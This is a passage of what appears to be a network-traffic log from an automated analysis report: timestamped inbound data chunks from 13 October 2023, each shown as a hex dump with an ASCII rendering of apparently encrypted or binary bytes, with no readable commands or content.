bb 48 67 97 8a 49 80 90 16 a7 5f cc 72 ce da 80 0a 9c 3f 6e c0 88 80 e0 5d b7 96 06 d2 90 65 19 35 ab c1 77 c8 54 17 5a 70 59 d6 07 8c 18 cb 7d b5 41 f3 4b 17 13 be a9 d8 c8 05 0d 41 a2 49 61 Data Ascii: `_ybM2Ex5/nXEQ0T3,@<U?_8'Zx9SX"sry1Ek4KkemNvzz#f)mfE\5!PNA8]bI>wB!H+j2CYHgI_r?n]e5wTZpY}AKAIa
2023-10-13 13:21:16 UTC	10526	IN	Data Raw: f8 2e 7e 15 87 06 bb 19 36 96 31 dc a4 8b 77 34 40 9c 31 72 6e 3c cb 37 e2 14 81 79 72 67 7f 99 ac 17 1b 62 5c 82 9f 6f ed 12 11 dc fb b3 fc d2 52 70 73 cb 5c 79 5d de 44 90 b2 0b 4b 35 6c 83 e9 5b ea 60 e6 d5 6a e3 71 63 b8 b5 7c b6 c1 3f 47 24 70 e8 b9 e9 22 45 d1 09 70 85 84 4a 4d e4 3a 50 22 36 b3 96 35 a1 2e f3 2d 5a e1 67 94 d6 76 fd 73 a9 01 95 26 61 35 1f e6 bf 14 e6 7b 6f f9 49 41 97 4c 79 af f1 ff 53 3a 6f fe b8 d4 cc 73 72 72 8a e6 6e 5c 28 8a 26 61 c5 46 0c dc 0e 15 d1 f1 4f 74 dc c1 a0 82 80 75 c8 63 83 fc 01 ec f3 a8 d0 1f d9 2a 19 e5 25 c6 63 9a e7 cf c2 cb 40 a1 8a 5b 24 e3 cc 82 25 7e 11 03 64 60 07 a8 26 7a a8 0e f3 d5 e7 30 7e 8e 7a 03 fd 81 5e f6 fb aa e9 db 44 41 a1 85 86 76 37 99 3e c1 19 12 fb b7 85 9d 60 e9 98 77 8a 36 dd 3a 17 f2 Data Ascii: .~61w4@1rn<7yrgb\oRps\y]DK5l[`jqc\|?G$p"EpJM:P"65.-Zgvs&a5{oIALyS:osrrn\(&aFOtuc*%c@[$%~d`&z0~z^DAv7>`w6:
2023-10-13 13:21:16 UTC	10542	IN	Data Raw: c6 21 62 bf 08 75 40 f1 50 30 26 8d 8e e0 b8 df 0f 49 43 17 56 db 80 d0 5a e4 f2 51 21 73 c3 e6 14 b5 4d 90 6d 38 06 5f cb 40 ef 20 df 98 cd b8 a8 8d 21 1d 25 9d f4 2b c8 a6 a6 50 6f 09 63 e6 e7 d4 e2 ae 83 0e 3f d2 7d 59 ce d5 34 4a 56 f6 f7 7c bd af 3b 74 64 e6 a7 de 25 a0 a9 88 e7 d7 89 3c 6e ec db 29 75 a5 f7 16 46 6d 4d 45 ab c0 e9 3a 79 fa 57 a7 64 d4 22 73 8f 99 85 1e 67 86 20 3d 7c 07 c2 d6 ee 51 4b 57 c5 37 2b e7 19 06 86 ac bf 25 4c 96 d7 58 9e d3 06 8d 49 c5 80 c2 45 b6 b7 3b ad c3 b4 5e c7 d9 a7 a2 bc 09 58 be 05 ad ca bd cd 8a c3 4a d2 a5 8b e5 c7 e5 69 94 ed 60 53 f5 55 96 ab eb 41 b1 0d 94 16 29 c9 d3 04 3e 57 e7 8e f0 df 7a 24 9b ae 99 5c e6 6f db d7 f2 15 81 9f ce 7f 2c aa 28 15 3a 0b 50 b7 26 35 09 ea 79 3f a2 a6 e2 be b4 76 1b 6a a9 ab Data Ascii: !bu@P0&ICVZQ!sMm8_@ !%+Poc?}Y4JV\|;td%<n)uFmME:yWd"sg =\|QKW7+%LXIE;^XJi`SUA)>Wz$\o,(:P&5y?vj
2023-10-13 13:21:16 UTC	10558	IN	Data Raw: 0d 37 cb 90 1d ad c4 8c f2 61 ea 02 a5 d2 c1 10 f7 41 d4 a8 7f de c4 e3 3d 88 1a f2 2e c6 f4 e4 bd b0 28 73 08 7e 09 be 01 66 c4 47 6e 3d f1 4e 06 db 4a 3e c2 4d 62 a4 c2 58 42 f6 ec 06 07 ee f8 6c f6 05 eb 46 f1 b7 2a cb c7 4d a7 e4 33 05 00 1d f0 8f a8 b7 06 76 c7 04 f2 84 80 19 d8 7c 5f 32 f1 0d 62 f6 ee 97 2e fb de fe 9a cc 70 da 14 d9 7e 43 d9 42 62 fa 2f f1 c5 c9 f1 23 ae c8 c6 26 c0 8f c2 50 61 84 66 40 18 48 76 7f e0 22 3d f3 0a 8f f4 57 07 49 e8 e2 29 ae 3e 47 18 72 41 06 3c 22 c4 99 1c 4e fa 3b 94 12 19 90 2d 89 f2 6c eb cd 9a ce d9 0c c9 8a bc 4d 82 19 d2 ae 13 81 41 79 ee 82 5d a0 23 60 16 59 73 dc ee 25 17 e8 f2 17 ad 19 0f 91 b6 4c 8c 45 15 1d 5d 00 bf 64 ce 20 47 eb 5e ee 6c fa 5d d4 9c 3b 1d 2e 98 0a 2d ef c7 2b da c4 b3 3b 21 a6 7b 9a 75 Data Ascii: 7aA=.(s~fGn=NJ>MbXBlF*M3v\|_2b.p~CBb/#&Paf@Hv"=WI)>GrA<"N;-lMAy]#`Ys%LE]d G^l];.-+;!{u
2023-10-13 13:21:16 UTC	10574	IN	Data Raw: 4b 37 be 49 8d a1 85 b4 40 47 79 ab 56 30 90 11 95 cb b6 74 8e b6 d6 c1 df e5 fa 4f 71 5d ef 6b 83 54 93 4c fc 3b 3a 77 88 50 89 75 b2 f1 d3 16 23 d4 52 ec fd 15 44 be 7a 23 f2 68 42 6c 50 46 14 b8 63 8e 9f e5 9d a1 81 54 e6 01 65 41 e0 42 50 67 1e d9 e6 52 3f 52 e4 1e fb 8d d8 6d e8 27 61 e3 0c 53 80 24 70 0e 7f a7 46 57 44 48 28 cd f6 54 ad 20 11 9b 6c 70 3e fc a7 82 ba aa 88 b5 20 fd d3 1c f9 c1 6f c4 54 88 27 22 19 1b 35 aa 53 9f d4 51 99 fd 81 e2 cd b4 3c 76 43 dd 70 db 4d bb 0c f2 ee c3 ed ac 4a a2 60 83 04 c8 a8 8c 07 8e 6a e1 5f 5a 83 71 c7 5a 81 91 71 34 c6 43 33 45 33 99 c0 b8 ec f6 f5 f0 21 79 d5 3d 60 11 cc 44 85 46 ae 30 c5 82 ee ec dd 63 09 d6 6a be 9c 40 17 f0 fa 1d a8 c1 49 d7 39 1d 74 60 5b f1 1e d3 ba ca 52 fd 4b c0 f9 cd f0 86 d3 7d 42 Data Ascii: K7I@GyV0tOq]kTL;:wPu#RDz#hBlPFcTeABPgR?Rm'aS$pFWDH(T lp> oT'"5SQ<vCpMJ`j_ZqZq4C3E3!y=`DF0cj@I9t`[RK}B
2023-10-13 13:21:16 UTC	10590	IN	Data Raw: 0a 34 4e 11 28 b0 8a f9 f7 6a eb f1 d0 ee 8d 04 98 a4 d2 68 92 fa 78 40 3e 2c 0b ef ee b9 c1 13 4b d8 38 58 a7 13 66 e6 ed cc 4f 71 36 6d b1 8c b2 7b 1e 1b ef 40 4c db bb 85 2f e4 38 0a 79 d5 e9 c1 9a aa 83 be b4 26 2b 6b fc e4 17 30 cb 05 36 b0 b0 f9 a6 6f 75 e0 b2 46 dd e9 07 6e 7f f9 39 ea 79 53 ae 35 d9 ba d5 04 71 26 61 fb 99 0a d6 03 97 3a a5 e2 bf 90 e2 e7 3e a4 03 7e 2b ba 37 c2 cf 6f 41 c1 20 c6 e9 c2 a9 03 66 84 d6 4e eb b6 e7 46 37 38 59 69 8e 02 a7 aa cd 70 44 7c 9b 31 7a e8 51 af 7f 39 76 77 49 8e 5d e5 33 0c ea 7e dd 31 b5 8a e9 13 f7 6b db 55 21 23 50 d0 10 d8 ef b7 1e a8 a9 55 8e 9f 2e d0 f1 ec 19 98 0d 4c df 99 a5 3f 80 63 ea a6 d6 d5 f8 c4 fd 97 6d 7e ce 78 4d 38 55 78 23 09 af 79 a0 99 a9 25 71 c9 ca c3 6b dc b1 df 1e 50 88 2b 2c 18 1f Data Ascii: 4N(jhx@>,K8XfOq6m{@L/8y&+k06ouFn9yS5q&a:>~+7oA fNF78YipD\|1zQ9vwI]3~1kU!#PU.L?cm~xM8Ux#y%qkP+,
2023-10-13 13:21:16 UTC	10606	IN	Data Raw: 1d c8 a1 8b 4a 7b a7 0f a8 32 97 0b fb 62 ee 6e 0e fb f8 89 2a 49 bd 9b af c3 0f cb 41 c9 e3 f9 3e 86 72 f8 69 78 aa e2 e3 0b e0 44 1d 27 9d 85 8d cb 06 d8 e4 b0 a6 a2 d8 39 be 84 77 52 e5 be 77 c3 f5 f8 d6 1a 2f 44 fc 81 14 be 97 21 6b 60 15 07 17 74 69 c1 fd 72 2f 6a 17 0c 27 f0 14 54 ad 0f e0 bc 8b b1 bd 2b ea 8b 01 64 7a 27 8b 26 af 6e c8 9c a8 b0 60 6a 5a 01 22 72 dd 65 9a 5f 99 d0 85 eb bc 02 b5 02 e5 bc 32 33 7d d3 33 05 f4 90 d9 2e e9 f3 e8 8a f4 7d 78 54 ea 39 d1 3a ca ca e7 46 97 3c 02 5a 1c c4 9c 45 7c d4 02 cc 09 af 55 60 90 5b 78 57 b6 4c b7 8f 5d 54 6b 72 ec 58 cb 22 d3 5b 7f 68 ed e3 34 56 2a 03 3a 35 68 85 88 65 41 ec fd e5 d1 d4 a9 24 f3 66 c6 c0 e5 d0 30 ef 35 59 28 4a e4 b9 d8 ad 06 b3 8b 9c a9 60 64 aa c3 d0 2c 68 5c 10 79 3b ca a1 e1 Data Ascii: J{2bnIA>rixD'9wRw/D!k`tir/j'T+dz'&n`jZ"re_23}3.}xT9:F<ZE\|U`[xWL]TkrX"[h4V:5heA$f05Y(J`d,h\y;
2023-10-13 13:21:17 UTC	10622	IN	Data Raw: 45 57 71 71 1f 5f 13 37 49 6f e7 ff 78 1c 37 bb 51 d1 11 14 62 49 4b 45 5f 52 94 1a ef 8c 93 4d 98 4e c0 46 e1 20 cc 3b 9a 00 db e3 43 67 12 a5 20 86 e6 00 10 3a 55 91 73 a3 cb 35 6b e6 69 f4 d5 75 c4 bd 1a f5 6c fe f6 be f1 dd 42 1c 5e b4 a8 96 f8 d0 9f f7 09 b8 0b ff b9 b3 f7 b2 82 3c 83 68 78 ea 99 92 fd ff dc 09 41 91 26 be 93 b5 6d 55 09 57 53 50 8f 01 34 69 bb 3f 0f 2f a8 3c 1c e3 1c d9 85 3a 49 ee 3c 18 cb 6f 69 b0 24 88 79 60 19 78 4e 5a 6e 08 a3 b8 d0 2b 2b 06 90 ff 63 5b 2f d4 ca 53 82 47 a4 55 f3 d1 06 2f 2b ae b6 d8 49 d7 1d 1b 37 99 19 31 05 bd 7d 1c ee 84 54 30 db 23 d9 88 9a 81 fc c6 fa 80 b1 b5 7c 6b e4 c4 3f d3 a9 08 0d 05 dd 63 88 ce a9 da 82 0f 86 df d4 39 e1 19 a3 93 ce 3c 88 c3 89 cc bb 85 d1 00 79 14 67 19 e4 1c f8 f3 d9 1e 0f a7 f2 Data Ascii: EWqq_7Iox7QbIKE_RMNF ;Cg :Us5kiulB^<hxA&mUWSP4i?/<:I<oi$y`xNZn++c[/SGU/+I71}T0#\|k?c9<yg
2023-10-13 13:21:17 UTC	10638	IN	Data Raw: 4f 5c 31 d5 2c 5d 46 44 e8 dd ae ac 38 f5 3c e1 16 58 27 84 33 bf ad 2c 62 5c 1d 8d 09 85 d3 a2 95 15 e2 44 e4 9c 2c 39 5f f3 f3 4d a6 48 2f 4f 69 4b 9d a7 4b ab 66 3b de c3 cc 48 bf 01 78 07 e4 4d c5 a6 65 7a fe 86 d5 9d a8 a9 0c 2d 21 14 54 b2 fd a8 74 eb bf f9 a5 a9 98 2e 03 98 c3 a8 d5 aa 9e d4 bd b0 7c 48 e3 88 b7 5c 6b 0b 7a 8e 36 e9 77 1e 03 1e ba a7 ab de 88 e7 d8 ea fa e9 c6 2b 62 93 5c c4 57 3f 57 66 6e 09 96 54 5e 06 b3 20 2a f0 54 ad 64 84 ec eb 45 99 e9 77 91 5a 63 f9 cb 4b cd a9 d9 d0 ef 31 2c cb c2 f6 45 27 96 a7 1c 55 7d 23 19 9a 4d 36 c8 df 8b 69 f6 60 2a 72 cc 2c 8d 1d 5d 2b c3 a3 18 77 f2 3a a2 fe e1 3d ea 94 bc 1e cb fa 6c 63 cc 13 67 17 a3 02 2d a6 82 eb 3a 04 06 bc 02 7f 48 b2 08 60 db ad af 44 e8 e0 24 06 da 9b ee 46 21 39 54 41 af Data Ascii: O\1,]FD8<X'3,b\D,9_MH/OiKKf;HxMez-!Tt.\|H\kz6w+b\W?WfnT^ TdEwZcK1,E'U}#M6i`r,]+w:=lcg-:H`D$F!9TA
2023-10-13 13:21:17 UTC	10654	IN	Data Raw: 02 5b ff ed 17 78 e7 bc fa 2a 37 6e 82 27 e9 45 cf 65 af b4 b3 e1 32 2c 0c 2c 80 ec 04 07 58 47 2d b3 96 b7 15 d3 fc ca 88 05 15 68 39 e6 11 d3 1a 24 5b 5f a8 17 9a eb 81 74 95 bd d4 4c c4 73 37 cd d6 68 97 78 fa a2 2e 38 8b 6f 3d 39 9c e9 6d 7f c8 04 06 ed 07 15 a4 86 a4 c6 0c cb 8f 7e cc b6 fe db b5 e1 33 39 6f 2e 27 0b 0b d3 51 ce 83 dc 42 08 8f 5f 7e a8 32 5d 79 4f 25 6d bc 34 6a 1e 55 20 cf 17 5c a0 cb fb dd c0 cf bc 29 cf 5b 96 ee e9 9d aa bd 99 29 d1 91 5e 50 9e db fd 16 d1 95 d3 f3 3c bd d3 ef 68 1c 0c b7 b9 7e cd 47 1f 90 ef 23 1c d9 a1 3a c0 3b b8 9f c1 cf 11 29 f3 b4 13 dd 9a e8 a4 bb c7 b9 97 09 61 f2 eb 8f c5 5f 42 58 e6 a3 06 59 e1 85 7c 9d 53 83 13 0b 61 a4 78 e5 70 aa e0 fa 75 38 e3 71 53 47 d7 9c 89 f7 b0 0a ff 0e 72 09 2d 1b 88 bd b5 a8 Data Ascii: [x*7n'Ee2,,XG-h9$[_tLs7hx.8o=9m~39o.'QB_~2]yO%m4jU \)[)^P<h~G#:;)a_BXY\|Saxpu8qSGr-
2023-10-13 13:21:17 UTC	10670	IN	Data Raw: 5e cd 24 c6 b8 90 21 c2 a1 15 34 d7 65 be 9e 56 ea 66 7d 92 bc 0a 1f 0d 31 05 b0 77 48 d4 46 bb db 34 e9 3f c8 d4 c6 60 d2 25 14 fb 88 ff ff 24 1c c9 dd 45 84 67 8d 39 e4 4c bc 46 49 d8 1b fd e5 3d 73 cf 57 a8 05 0c 41 a9 1c ac 7c c1 e6 60 e9 42 d7 ab 2e 2b 38 5e dc 29 7e d2 dc 8a 6c 02 ef 7a ce 33 08 3c c5 00 f1 e2 54 48 a8 f1 32 d4 7a 70 f9 a7 64 a6 91 5e d0 03 83 dd a1 71 82 5e ab fe e5 f6 a4 aa 05 25 26 b8 21 d2 02 6f 4c 16 13 c7 09 6c ba 1d 97 5f 3d 7d 17 d9 9a 23 bd ff e7 bc 8e 34 a0 6f c3 ec 8e 0f 96 0b 0f da 85 a4 56 bf 78 20 ac 30 ee a2 ca 15 35 a2 23 07 19 28 cb 09 ef 9d 4a 3f 07 d8 d6 22 45 a0 1b fc e5 6b b9 7a 7b fe d2 40 32 cb ac 2c 5e 85 6e 46 83 43 4b a5 ba 63 a4 5b fb a8 bc 95 de 01 40 df b7 a0 de 60 75 46 f3 64 ef 81 58 bb 27 a6 8f a2 ed Data Ascii: ^$!4eVf}1wHF4?`%$Eg9LFI=sWA\|`B.+8^)~lz3<TH2zpd^q^%&!oLl_=}#4oVx 05#(J?"Ekz{@2,^nFCKc[@`uFdX'
2023-10-13 13:21:17 UTC	10686	IN	Data Raw: e4 ab a8 d5 b6 4f f4 07 8c 20 ae f0 77 41 97 9b 8d 23 a9 f8 fc 53 7b 5d a8 47 10 86 ce e1 b9 fe 7d 73 d4 72 b5 e6 d9 b4 e6 bf ba 72 7c e5 f4 b8 e6 9c 29 62 7b 59 62 d0 0b 8a 90 f0 64 61 a9 6e fb 09 d4 0f ab 95 60 56 72 e7 d1 aa 58 7a ff 03 99 e2 98 a8 9a c8 64 27 1b 0f c8 b6 4f d1 df 86 c1 73 4b de fd 76 ab 96 cf f6 19 34 c5 67 bb 5d e7 a8 f4 7b d3 01 95 92 64 c6 04 c1 a3 9a 4c f8 8c 5a e1 2c 8b 93 c8 af ee 31 81 c1 ea 0c bc 87 4c ea ff 7e ad 2d 63 8b 43 12 20 f6 3a 11 88 c9 95 95 c4 21 13 2c e7 62 f7 f1 57 26 19 79 b6 6f 43 b0 5c 1a f1 50 c9 72 37 62 6d 31 d3 ad da 7c 17 f2 01 45 b1 6f b1 15 c3 5b 99 9c 11 b2 c7 f5 33 90 97 e6 73 50 23 c9 b3 fc fc dc 12 0f ac 96 f0 67 43 dc 1f 3a d4 61 03 5f 58 a4 5b 5c 42 07 98 ff 7b 16 da 11 bb 63 b8 8b 8d da 16 6c c9 Data Ascii: O wA#S{]G}srr\|)b{Ybdan`VrXzd'OsKv4g]{dLZ,1L~-cC :!,bW&yoC\Pr7bm1\|Eo[3sP#gC:a_X[\B{cl
2023-10-13 13:21:17 UTC	10702	IN	Data Raw: cd 75 b9 55 83 cd ba 33 00 b0 88 b4 d7 87 59 23 87 a9 ca d8 29 75 93 cb 69 9a 10 ca 23 b4 9c 85 cd ef 8a ea 58 80 79 64 ea d2 8a d7 7f 74 90 e1 b0 7a f7 1f be 16 49 28 aa 87 8e 43 c8 18 93 53 10 b4 4c dc d1 99 fa 91 fd e4 a3 0b 6b 6b 7e 99 c8 a7 f6 3c 50 e1 32 32 6f a7 fc 97 b8 cb 55 ec 24 bc b3 aa 66 3d 3e e2 29 10 1d 02 b3 82 15 a4 24 7d 7b ca 45 7f 61 0e 08 c8 ab 41 fa 59 38 c9 5a d6 66 60 bb cc d4 75 ea 85 53 eb 4c 2c a4 bc f9 43 91 42 eb 8d fc b6 1d a5 fa 98 d1 1f 45 42 a3 93 2d 25 dd 9b 24 a4 7c 3f 2a c2 da 6d be 2a f7 68 fe 62 35 ce e8 6a 96 e4 b6 cd 1d fc ee cf 63 3c c1 c6 94 5f 31 d8 a9 a3 11 08 9e a4 e9 17 ce 72 fe 3b c9 92 71 76 71 9a 3e 0b de cc ca e7 92 85 c6 eb c6 e1 ee 5c 43 33 48 4c af 46 0a 2a 26 05 af 0f bd fa b9 0d f9 67 0d 16 1e fc 6e Data Ascii: uU3Y#)ui#XydtzI(CSLkk~<P22oU$f=>)$}{EaAY8Zf`uSL,CBEB-%$\|?mhb5jc<_1r;qvq>\C3HLF*&gn
2023-10-13 13:21:17 UTC	10718	IN	Data Raw: 94 76 66 66 76 0f f0 9e 34 fc ce a6 16 cf f1 df 99 c3 82 87 3e 14 d6 d2 92 57 8b 05 01 1b 98 28 2e 62 4d 6e 24 5b c2 97 55 18 bd ba 33 bb ed 47 bb 34 ed 74 ef 9c 27 50 55 57 0f c1 ba 9e b0 77 96 a3 c0 6d 32 de 37 84 d6 1d 8d 3e 69 ae 72 99 db 2e c3 a2 c8 15 4b b7 55 9e ed 6c 6b d9 0f a1 52 08 b3 1a cf 06 0b 8b 51 fa 17 fc ab 9e 97 58 4b 94 e5 e7 f2 52 cc 7a ef f7 fb 88 a9 27 6b f9 68 d9 b4 ad 4d e6 aa 88 60 f3 1b d5 89 a3 f1 a4 aa c1 15 5a eb 15 49 45 b6 ff 12 7f fc 70 fa f1 c6 d5 5f 4a d3 ff 29 38 a3 0e f1 58 7a 13 96 6a af 95 35 bc e5 26 3b 0d f3 41 c7 96 da 03 13 82 16 6b 12 a4 ff 60 0c 70 64 83 2f da c4 74 91 84 17 02 e6 4d 49 e2 57 0d c6 99 a8 3b 83 8f ab 14 29 82 9b 83 02 23 b1 60 92 fc b6 2d 31 13 34 14 7d f5 5b 7a 14 fc b0 fb 62 d0 f6 f8 e5 08 09 Data Ascii: vffv4>W(.bMn$[U3G4t'PUWwm27>ir.KUlkRQXKRz'khM`ZIEp_J)8Xzj5&;Ak`pd/tMIW;)#`-14}[zb
2023-10-13 13:21:17 UTC	10734	IN	Data Raw: d7 f1 0f f5 ff 05 57 64 b1 6a e0 99 5c 74 59 52 10 25 35 54 45 fc 68 59 d8 89 3c 55 92 c4 e1 24 84 ed b2 ab 25 96 e9 ea f3 ee ce 29 92 a0 f3 d9 78 92 b1 b5 8f 73 f9 26 f6 f9 f3 0d 84 77 5c d5 48 7f 35 d3 49 90 83 73 a2 fe 6a f3 8d 86 f9 a9 2b 01 34 27 de 52 38 d1 73 80 d8 8e e5 59 89 b1 a3 50 29 5a 48 ba 84 64 6b 8e c2 0c 49 c6 87 66 06 f9 ba 41 a8 f7 7b 37 5f 11 d9 e3 6a f0 80 b9 86 ae 9d f9 22 79 4a 54 26 1e fa 2e f0 a9 84 d2 c8 89 12 77 1d a2 9b 1f 67 18 b9 d5 08 ca 5d 7f 01 de 27 a7 ce 3d 10 3a 88 d0 1c 36 f4 c7 12 03 d2 9b 21 d8 75 a4 5d 3b ca af b5 eb df af b6 4e 3c 09 29 90 0e ac e2 92 fd a7 13 de b3 ca 4a 4d 7c dd 0b 01 21 6e 55 e8 72 93 c0 aa 8e 85 40 d7 29 27 d7 03 c1 92 c8 d1 12 9d c2 69 88 63 97 b3 b2 2f 11 7f 53 9a f5 10 2c 69 07 92 6f 96 ff Data Ascii: Wdj\tYR%5TEhY<U$%)xs&w\H5Isj+4'R8sYP)ZHdkIfA{7_j"yJT&.wg]'=:6!u];N<)JM\|!nUr@)'ic/S,io
2023-10-13 13:21:17 UTC	10750	IN	Data Raw: be ff 7e cd 3c f5 6d f6 4e ba 1e 35 96 eb f1 04 be 72 6f 12 97 ca 4f 53 8d e6 a3 af 03 56 a2 d7 45 10 5e b9 4b 2c 9f 93 5a 21 65 64 ef 61 84 a2 bc 00 68 e7 5a 10 fc c1 5c eb 28 d7 80 e9 3f 81 59 50 5b d8 2a 32 86 e3 c1 7d c8 8e e2 63 26 3d e4 7b 83 ec a1 6d 2e 29 77 9d 0d 5f 60 ea 25 6f 06 14 65 6e 71 8f 03 b1 ab c2 3d 2d ff c4 ed 5f 19 72 c7 06 94 fa 91 6b 79 6c 81 ea d7 02 ff 6e 37 61 be 10 0b bc 27 6c c5 83 02 e7 86 64 73 f1 d7 64 b8 2e 2c ec 87 55 bb 24 13 23 cd f6 1f 16 44 4f 98 d2 b1 89 15 15 50 c5 f2 be 9e 87 af 1d 45 fa 57 82 d9 c7 72 32 76 0b d1 4d 6a b3 27 58 2a db 8c f7 5d d8 f4 5c ca f2 c7 c1 f3 3d f6 c9 f0 da d8 2a 04 0d b3 bb 29 cc e3 11 0f b9 d7 57 13 76 2a d5 6c fe 3e 8c b8 eb c4 4c 39 b9 63 2c 39 97 89 86 c9 79 d4 cb 5f c5 43 5d bc d2 de Data Ascii: ~<mN5roOSVE^K,Z!edahZ\(?YP[2}c&={m.)w_`%oenq=-_rkyln7a'ldsd.,U$#DOPEWr2vMj'X]\=)Wvl>L9c,9y_C]
2023-10-13 13:21:17 UTC	10766	IN	Data Raw: 77 f6 1d 8e 06 68 0e ca 4d 13 df 40 a9 30 c2 73 0d 2d f4 d3 e5 2e 01 0f c7 f8 f9 d5 c0 33 cf 51 d5 01 0e b5 eb 26 4d 7a 75 d0 59 57 95 8b 4c 9c 66 1d b2 52 0e 3f 56 e7 65 6f 1e e3 cc f3 61 b9 4e 34 fc 6a 92 cd 94 56 a8 3b 7e 66 68 fb 41 e2 4c 2e 6c ef 2b bf a0 ff d5 11 dd 81 b3 db e5 af ea 83 c0 29 b1 af 18 5c 5d 30 3f ff 5f 43 29 b3 a8 c3 13 7a 1e 6b 0c 19 ed 5b 4f ee fd 52 a7 f9 c7 87 86 d6 dd 11 eb 85 56 ff c3 81 b6 63 8b 97 60 e8 c3 af 6a 0a b6 5a 39 41 f0 3e fb 9b 3e c7 a8 84 92 f5 4e ff f6 62 e9 99 c1 ec 6a d6 b5 02 61 9f ba e3 6d 15 db 4f 5d 35 0f 54 c4 21 b4 03 9b a6 60 4a 25 25 66 c4 e3 c9 74 56 aa 29 33 06 29 bd d7 fd 6a 43 b5 5c 22 29 c1 be 2d 37 c1 bc ad 01 c8 fd 6d 4c 6e d1 7e 92 2a 4b dc 5b e5 4e af 54 48 5c 4f aa 99 87 bf e0 76 be a4 74 c7 Data Ascii: whM@0s-.3Q&MzuYWLfR?VeoaN4jV;~fhAL.l+)\]0?_C)zk[ORVc`jZ9A>>NbjamO]5T!`J%%ftV)3)jC\")-7mLn~*K[NTH\Ovt
2023-10-13 13:21:17 UTC	10782	IN	Data Raw: 5a 0c c6 48 05 18 7f f5 9e 8f cf bc 00 14 20 2a 4c 39 4e ea 61 b6 96 50 6c dc da ab a6 87 79 aa d2 2a 1c fd fd e3 19 eb 43 2c f2 24 38 20 f3 be 80 b6 40 57 d9 77 f1 20 ee 3c 20 d0 29 35 44 f1 88 7a 6e b2 0b 79 6e 64 01 77 cb 75 ed f1 01 4e bf 70 cf 2b fa 0e 15 57 7f d1 2b 85 a5 f9 10 14 bf db eb 15 83 86 d1 72 25 6b 4c 25 d0 28 be 14 3d a4 34 f9 28 03 57 81 24 cb 5e c6 d3 4e c3 30 db 6f 5c d5 e4 d6 c7 4a ae 48 71 2a 65 98 43 95 e7 dd 5c c5 6b 85 7b c3 ce 82 6f 6f 82 20 b4 95 6b d0 3e e7 92 c8 60 67 d8 d5 91 6d 7b ef b0 3f f8 cd ab b4 76 0e fc 46 40 97 32 ba e8 24 b6 e5 29 c0 c4 97 36 81 99 69 d7 35 0f e4 f9 91 8a 3a c1 d1 91 6d 65 40 53 81 4a e2 8d 46 19 de 9b 00 3a 52 a8 a5 8f f3 09 a6 a3 9d ea 50 ba 59 f9 b2 9e 98 2e 77 e1 01 3b 1a ea 20 48 4a a1 96 60 Data Ascii: ZH L9NaPlyC,$8 @Ww < )5DznyndwuNp+W+r%kL%(=4(W$^N0o\JHq*eC\k{oo k>`gm{?vF@2$)6i5:me@SJF:RPY.w; HJ`
2023-10-13 13:21:17 UTC	10798	IN	Data Raw: 1d fb dd cb 6d 01 d5 c9 ce 60 42 e4 e1 23 9f 95 d5 ce f6 b1 57 e2 ce 90 bb 81 ce 86 02 d0 98 49 9f e6 d5 39 db fa 13 d8 11 f4 d1 bd 85 3b 81 4d d7 3b 4e fe fd 32 54 bf 44 82 9a 24 ff 05 be 88 27 73 70 00 75 93 34 bf cb a7 fc 69 64 6b 38 ec e3 dc fb f1 4a fd f1 dd 24 66 ce f1 c1 2e 55 5a ab d5 1c 42 cd 71 96 22 d0 8d ba bd 10 55 71 2a 6b f2 dd 7b 75 5e 80 4e 77 81 f1 a2 d5 69 ae 3f af 65 42 7f ea de ed f3 84 70 88 ed 82 e6 93 fa ba eb 1f d9 03 7b 38 98 30 4e 2d e9 f9 98 94 6e 8c b0 fc 13 37 81 e2 70 5a 1f a9 e7 a3 45 3a 42 50 73 c5 fd 8d ae fb bd b9 b7 93 54 98 2b 2e 7d 26 e9 f4 64 d5 55 46 88 a6 c7 3a de 7e 5c 64 74 f6 19 2f 0c 1a 93 19 15 1a 3f 51 92 b8 01 c4 4c 60 88 90 db 44 32 74 2d ab 95 68 dc e7 ba 1c 19 df 2e d9 d7 42 87 c6 d6 6a 42 f8 54 5e f5 12 Data Ascii: m`B#WI9;M;N2TD$'spu4idk8J$f.UZBq"Uq*k{u^Nwi?eBp{80N-n7pZE:BPsT+.}&dUF:~\dt/?QL`D2t-h.BjBT^
2023-10-13 13:21:17 UTC	10814	IN	Data Raw: 43 4e e9 1a db ef 69 1e ad 9f ed 3d 2c b6 4b 9a d4 53 19 0d 6f e6 42 c3 4a 83 f5 41 b8 5b 70 d5 b3 fc 4a 74 33 b5 c2 64 20 21 ea 54 f8 70 a5 3f 05 94 1d 61 a7 0e 2b 32 bf 63 de 7c a2 80 b1 c9 2e 54 d8 11 20 6c b8 b9 fd 0b d9 7f b3 ed 3a 02 16 9a de ef 46 5f 46 93 5f 08 93 2c 16 6b 78 91 f5 37 c7 dd 99 6c 59 2a 77 12 3f fd 5d 05 36 af a8 d7 82 7f b7 0e 63 f8 29 5c 16 7d 72 d4 29 a8 d2 27 93 24 07 96 6d b0 74 9f 88 00 17 90 fe ba e5 42 d1 fb b7 f9 bc 60 bd 73 a5 51 70 3d b3 4b 6a 8c 19 1a 5c ac 89 75 de 12 a5 3f 79 86 9d 21 04 12 a3 97 7f 65 af f9 2e 93 5f 8c 55 88 37 c7 58 37 13 66 05 8d 5b 8c a3 ef 2a 48 e3 b4 36 1d 9a 82 b6 10 a3 e4 80 37 70 be d4 2c 70 ea 69 c6 26 b0 a3 71 a6 49 b3 d3 ce e0 0e e4 f9 7a 74 37 13 77 f1 ff d4 71 73 e8 68 cf 82 97 d4 bc e1 Data Ascii: CNi=,KSoBJA[pJt3d !Tp?a+2c\|.T l:F_F_,kx7lYw?]6c)\}r)'$mtB`sQp=Kj\u?y!e._U7X7f[H67p,pi&qIzt7wqsh
